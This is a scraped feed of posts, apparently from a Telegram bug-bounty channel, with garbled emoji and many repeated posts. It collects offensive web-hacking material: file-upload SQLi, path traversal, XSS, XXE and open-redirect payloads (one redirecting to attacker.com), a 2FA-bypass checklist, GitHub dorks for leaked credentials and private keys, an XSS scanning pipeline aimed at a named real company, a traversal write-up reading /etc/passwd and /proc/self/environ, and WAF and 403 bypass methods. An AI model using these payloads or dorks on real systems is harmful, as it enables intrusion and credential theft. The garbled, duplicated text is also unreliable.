Now you can detect phishing websites quickly with Nucleiβ€
nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
β€3π₯3π1
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1β¦"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE β³
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Please open Telegram to view this post
VIEW IN TELEGRAM
β€13π6π₯1
2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
π₯12π5
π₯π₯Github-Dorkπππ₯π₯
Happy Hunting
π api_key
π app_AWS_SECRET_ACCESS_KEY
π app_secret
π authoriztion
π Ldap
π aws_access_key_id
π secret
π bash_history
π bashrc%20password
π beanstalkd
π client secre
π composer
π config
π credentials
π DB_PASSWORD
π dotfiles
π .env file
π .exs file
π extension:json mongolab.com
π extension:pem%20private
π extension:ppk private
π extension:sql mysql dump
π extension:yaml mongolab.com
π .mlab.com password
π mysql
π npmrc%20_auth
π passwd
π passkey
π rds.amazonaws.com password
π s3cfg
π send_key
π token
π filename:.bash_history
π filename:.bash_profile aws
π filename:.bashrc mailchimp
π filename:CCCam.cfg
π filename:config irc_pass
π filename:config.php dbpasswd
π filename:config.json auths
π filename:config.php pass
π filename:config.php dbpasswd
π filename:connections.xml
π filename:.cshrc
π filename:.git-credentials
π filename:.ftpconfig
π filename:.history
π filename:gitlab-recovery-codes.txt
π filename:.htpasswd
π filename:id_rsa
π filename:.netrc password
π FTP
π filename:wp-config.php
π git-credentials
π github_token
π HEROKU_API_KEY language:json
π HEROKU_API_KEY language:shell
π GITHUB_API_TOKEN language:shell
π oauth
π OTP
π databases password
π [WFClient] Password= extension:ica
π xoxa_Jenkins
π security_credentials
#bugbountytips #GitHub
Happy Hunting
π api_key
π app_AWS_SECRET_ACCESS_KEY
π app_secret
π authoriztion
π Ldap
π aws_access_key_id
π secret
π bash_history
π bashrc%20password
π beanstalkd
π client secre
π composer
π config
π credentials
π DB_PASSWORD
π dotfiles
π .env file
π .exs file
π extension:json mongolab.com
π extension:pem%20private
π extension:ppk private
π extension:sql mysql dump
π extension:yaml mongolab.com
π .mlab.com password
π mysql
π npmrc%20_auth
π passwd
π passkey
π rds.amazonaws.com password
π s3cfg
π send_key
π token
π filename:.bash_history
π filename:.bash_profile aws
π filename:.bashrc mailchimp
π filename:CCCam.cfg
π filename:config irc_pass
π filename:config.php dbpasswd
π filename:config.json auths
π filename:config.php pass
π filename:config.php dbpasswd
π filename:connections.xml
π filename:.cshrc
π filename:.git-credentials
π filename:.ftpconfig
π filename:.history
π filename:gitlab-recovery-codes.txt
π filename:.htpasswd
π filename:id_rsa
π filename:.netrc password
π FTP
π filename:wp-config.php
π git-credentials
π github_token
π HEROKU_API_KEY language:json
π HEROKU_API_KEY language:shell
π GITHUB_API_TOKEN language:shell
π oauth
π OTP
π databases password
π [WFClient] Password= extension:ica
π xoxa_Jenkins
π security_credentials
#bugbountytips #GitHub
π₯6π4
Public Bug Bounty Programs [Domain,Subdomain]
https://github.com/trickest/inventory
Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/
Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports
Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty
Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD
Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
https://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en
https://github.com/trickest/inventory
Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/
Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports
Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty
Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD
Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
https://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en
GitHub
GitHub - trickest/inventory: Asset inventory of over 800 public bug bounty programs.
Asset inventory of over 800 public bug bounty programs. - trickest/inventory
β€4π₯4π1
Find xss with this automation of the following work
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script https://github.com/dirtycoder0124/xss
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script https://github.com/dirtycoder0124/xss
GitHub
GitHub - dirtycoder0124/XSS-Automation
Contribute to dirtycoder0124/XSS-Automation development by creating an account on GitHub.
π12π«‘3π1
1- on visiting url https://domain.tld it were redirecting first to https://domain.tod/dir1/dir2 then to sso login
2- Fuzzed after first redirection
3- https://domain.tld/dir1/dir2/FUZZ
4- this payload leads to 200 ok & disclosed all local files
////////////////../../../../../../../../etc/passwd
5- tried other local files
/etc/hosts
/etc/shells
/proc/self/environ
/bin/sh
Please open Telegram to view this post
VIEW IN TELEGRAM
π13
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
GitHub
GitHub - hakluke/hakoriginfinder: Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs!
Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs! - hakluke/hakoriginfinder
β€9π3π1
Use these tools to bypass 403 most time it give false postive always check for content length.Both tool bypass protocol based,header based,path based and more techniques.
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
GitHub
GitHub - Dheerajmadhukar/4-ZERO-3: 403/401 Bypass Methods + Bash Automation + Your Support ;)
403/401 Bypass Methods + Bash Automation + Your Support ;) - Dheerajmadhukar/4-ZERO-3
β€7